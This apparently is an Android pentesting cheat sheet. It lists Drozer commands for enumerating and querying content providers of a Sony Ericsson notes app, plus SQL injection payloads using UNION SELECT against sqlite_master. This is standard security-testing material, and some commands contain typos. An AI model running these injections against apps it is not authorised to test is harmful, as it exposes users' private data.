Skip to content

Improper Error Handling

Error handling is not properly done, and the API is throwing database/server errors specific to the crafted request, it is possible to craft attacks using those errors.

Content Provider Leakage

According to Google Android Security application can't share data with another application until it's allow to share. If application assign content:// to any application that means it's provide content to particular application.

Content provider leakage

By using Drozer to perform various attacks on content providers. We can find out the package name of our target application using the command shown as follows:

  1. Run app.package.list to list the packages installed on the device:
    #run app.package.list -f {appname}
  2. Run app.package.attacksurface to analyze the attack surface of a specific package (e.g., com.sonyericsson.notes):
    #run app.package.attacksurface com.sonyericsson.notes
  3. Run scanner.provider.finduris to find content provider URIs associated with a package:
    #run scanner.provider.finduris -a [package name]
  4. Example usage of scanner.provider.finduris with a specific package (com.sonyericsson.notes):
    #run scanner.provider.finduris -a com.sonyericsson.notes
  5. Run app.provider.query to query a content provider URI
    #run app.provider.query [content provider URI]
  6. Example usage of app.provider.query with a specific content provider URI (content://com.sonyericsson.notes.provider):
    #run app.provider.query content://com.sonyericsson.notes.provider
  7. Run app.provider.query with the --vertical option for a vertical view:
    #run app.provider.query [URI] --vertical (For Vertical view)
  8. Example usage of app.provider.query with a specific URI (content://com.sonyericsson.notes.provider.Note/notes/) and the --vertical option:
    #run app.provider.query content://com.sonyericsson.notes.provider.Note/notes/ --vertical

Attacking SQL Injection using Drozer

  1. #run scanner.provider.injection -a [package name]
  2. #run scanner.provider.injection -a com.sonyericsson.notes
  3. #run app.provider.query content://com.sonyericsson.notes.provider. Note/notes/ --selection "{sqlpayload}"
  4. #run app.provider.query content://com.sonyericsson.notes.provider. Note/notes/ --selection "_id=1"
  5. #run app.provider.query content://com.sonyericsson.notes.provider. Note/notes/ --sele,ction "_id=1=1)union select 1,2,3,4,5,6,7,8,9,10,11,12, 13,14 from sqlite_master where (1=1"
  6. #run app.provider.query content://com.sonyericsson.notes.provider. Note/notes/ --selection "_id=1=1)union select 1,2,3,4,sqlite_ version(),6,7,8,9,10,1112,13,14 from sqlite_master where (1=1"